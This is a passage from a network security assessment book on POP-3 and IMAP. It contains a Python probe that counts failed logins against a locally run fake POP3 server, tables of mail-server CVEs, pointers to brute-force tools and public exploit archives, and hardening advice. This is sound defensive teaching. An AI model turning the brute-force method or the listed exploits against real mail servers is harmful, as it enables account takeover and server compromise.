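                if user is not None and self.CREDENTIALS.get(user) == arg:
                    self.wfile.write(b"+OK Logged in\r\n")
                else:
                    failures += 1
                    self.wfile.write(b"-ERR Authentication failed\r\n")
                    if failures >= self.MAX_FAILURES:
                        return              # connection dropped; nothing is logged
            elif cmd == "QUIT":
                self.wfile.write(b"+OK bye\r\n")
                return
            else:
                self.wfile.write(b"-ERR unknown command\r\n")


def pop3_attempts_per_connection(host, port, user, max_attempts=50, timeout=5):
    """Send deliberately wrong passwords over a single connection and count how many
    the server answers before it disconnects. Returns (answered, dropped, hit), where
    hit is a guess the server accepted (None when, as expected, none was)."""
    conn = poplib.POP3(host, port, timeout=timeout)
    answered, dropped, hit = 0, False, None
    try:
        for i in range(max_attempts):
            guess = f"wrong-{i}"
            try:
                conn.user(user)                 # USER must be re-sent after a failed PASS
                conn.pass_(guess)
                hit = guess
                break
            except poplib.error_proto as e:
                if str(e) == "-ERR EOF":        # poplib reports a closed socket this way
                    dropped = True
                    break
                answered += 1                   # a real -ERR: the server is still talking
            except OSError:
                dropped = True                  # reset or broken pipe on send
                break
    finally:
        try:
            conn.quit()
        except (poplib.error_proto, OSError):
            pass
        try:
            conn.close()
        except OSError:
            pass
    return answered, dropped, hit


def run_demo():
    """Start the constructed server on a free loopback port and probe it."""
    server = socketserver.TCPServer(("127.0.0.1", 0), FakePop3Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return pop3_attempts_per_connection("127.0.0.1", server.server_address[1], "chris")
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    answered, dropped, hit = run_demo()
    print(f"server answered {answered} bad passwords before "
          f"{'dropping' if dropped else 'keeping'} the connection")
```

Run the probe over several consecutive connections as well: a server that drops after five attempts but accepts an immediate reconnect with no lockout on the account is still fully brute-forceable, merely at a slightly lower rate, and that is the figure to put in the report. The same measurement for IMAP is a small change using imaplib.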
Both unauthenticated and authenticated process manipulation attacks pose a serious threat to security. Most users who pick up email via POP-3 shouldn't be allowed to execute arbitrary commands on the POP-3 server; however, they can do so via post-authentication overflows in user commands such as LIST, RETR, or DELE.
At the time of this writing, the MITRE CVE list details a handful of vulnerabilities in Qualcomm QPOP (not including denial-of-service issues), as shown in Table 11-4. Serious post-authentication vulnerabilities are also listed in Table 11-4 because they allow users to execute arbitrary code on the server.
CVE reference | Date | Notes |
CVE-2003-0143 | 10/03/2003 | QPOP 4.0.5fc1 post-authentication MDEF macro name overflow |
CVE-2001-1046 | 02/06/2001 | QPOP 4.0.2 USER command overflow |
CVE-2000-0442 | 23/05/2000 | QPOP 2.53 post-authentication EUIDL overflow |
CVE-2000-0096 | 26/01/2000 | QPOP 3.0 post-authentication LIST overflow |
CVE-1999-0822 | 29/11/1999 | QPOP 3.0 AUTH command overflow |
CVE-1999-0006 | 28/06/1998 | QPOP 2.5 PASS command overflow |
Public exploits for these issues are packaged and available at http://examples.oreilly.com/networksa/tools/qpop-exploits.zip. At the time of this writing, there are no public exploits for the USER overflow (CVE-2001-1046). MSF, Immunity CANVAS, and CORE IMPACT have no support for QPOP issues at this time.
At the time of this writing, no serious remotely exploitable vulnerabilities are known in the Microsoft Exchange POP-3 server. Upon scouring the MITRE CVE list, ISS X-Force database, and CERT knowledge base, no publicized bugs were found. This fact may well change over time, so it is important to check these vulnerability lists to assure the security of this service component into the future.
Internet Message Access Protocol (IMAP) services are commonly found running on TCP port 143. The IMAP protocol is much like POP-3; a user authenticates with a plaintext network service and can then collect and manage her email.
Most accessible IMAP servers on the Internet today run the Washington University IMAP service (known as both UW IMAP and WU-IMAP, available from http://www.washington.edu/imap/), along with Courier IMAP (http://www.courier-mta.org/imap/) and Microsoft Exchange IMAP.
As with many other simple plaintext protocols (Telnet, FTP, POP-3, etc.), Brutus and THC Hydra do a good job of brute-forcing user account passwords from both Unix-based and Windows environments. As mentioned earlier, they can be downloaded from:
http://www.hoobie.net/brutus/brutus-download.html
http://www.thc.org/releases.php
IMAP services, like POP-3, are notoriously susceptible to brute-force password-grinding attacks, as they often do not pay attention to account lockout policies and often do not log failed authentication attempts.
Table 11-5 lists remotely exploitable UW IMAP and Courier IMAP vulnerabilities, along with MITRE CVE references. At this time, no significant remotely exploitable issues exist in Microsoft Exchange IMAP, according to a number of sources. A number of other issues relate to many other third-party IMAP services that are less common and can be found by searching MITRE CVE manually.
CVE reference | Date | Notes |
CVE-2005-2933 | 04/10/2005 | UW IMAP 2004f mailbox name overflow |
CVE-2005-0198 | 28/01/2005 | UW IMAP 2004b CRAM-MD5 authentication bypass |
CVE-2004-0777 | 18/08/2004 | Courier IMAP 2.2.1 authentication logging format string bug |
CVE-2004-0224 | 11/03/2004 | Courier IMAP 2.x unicode character conversion overflow |
CVE-2002-0379 | 10/05/2002 | UW IMAP 2000c post-authentication BODY command overflow |
CVE-2000-0284 | 16/04/2000 | UW IMAP 4.7 (IMAP4rev1 12.264) post-authentication LIST command overflow |
CVE-1999-0042 | 02/03/1997 | UW IMAP 4.1beta LOGIN command overflow |
CVE-1999-0005 | 17/07/1998 | UW IMAP 4 (IMAP4rev1 10.234) AUTHENTICATE command overflow |
The following public exploit scripts are available for a number of these vulnerabilities in the accompanying tools archive for this book (http://examples.oreilly.com/networksa/tools/). These exploit scripts are detailed in Table 11-6.
CVE reference | UW IMAP version | Target platform(s) | Exploit script |
CVE-1999-0042 | IMAP4rev1 v10.164 | Linux & BSD | imaps.tar.gz |
CVE-1999-0005 | IMAP4rev1 v10.223 | Linux | imapd-ex.c |
CVE-1999-0005 | IMAP4rev1 v10.223 | Linux | imapx.c |
CVE-1999-0005 | IMAP4rev1 v10.223 | Linux | imap.c |
CVE-1999-0005 | IMAP4rev1 v10.205 | Solaris (x86) | solx86-imapd.c |
The original BugTraq posting and technical details relating to CVE-1999-0005, including the exploit, are available from http://packetstormsecurity.org/new-exploits/imapd4.txt.
CORE IMPACT has no support for UW IMAP or Courier IMAP issues at this time, but it has support for a number of Cyrus IMAP, Lotus Domino IMAP, and MDaemon IMAP issues. Immunity CANVAS also has no UW IMAP or Courier IMAP support, but it has exploit modules for a number of third-party IMAP packages, including MDaemon IMAP and Ipswitch IMAIL IMAP.
MSF supports a very large number of IMAP issues in its stable branch, which can be reviewed at http://framework.metasploit.com/exploits/list.
The following countermeasures should be considered when hardening email services:
Don’t run Sendmail or Microsoft Exchange in high-security environments because the software contains many bugs and is heavily bloated. Sound Unix-based alternatives include qmail (http://www.qmail.org) and exim (http://www.exim.org), neither of which is as complex or susceptible to Internet-based attacks. It is advisable to use firewall-secure SMTP services and proxies or dedicated mail-scrubbing appliances to process Internet-based SMTP traffic before passing it onto Sendmail or Microsoft Exchange servers.
To minimize the impact of a user enumeration and password-grinding attack, ensure that all user accounts on SMTP and POP-3 mail servers have strong passwords. Ideally, SMTP servers shouldn’t also run remote maintenance or email pickup services to the public Internet.
If you do offer public POP-3 or IMAP mail services, investigate their resilience from brute-force attack, including logging provisions and whether an account lockout policy can be deployed.
Using SSL-wrapped versions of POP-3 and IMAP services will minimize the risk of plaintext user account password details from being sniffed. Plaintext services are open to determined attack, so you need either SSL or VPN client software to protect both passwords and the email data sent from point to point.
Ensure that inbound commercial SMTP relay and anti-virus scanners (such as Clearswift MAILsweeper and InterScan VirusWall) are patched and maintained to prevent circumvention attacks from being effective.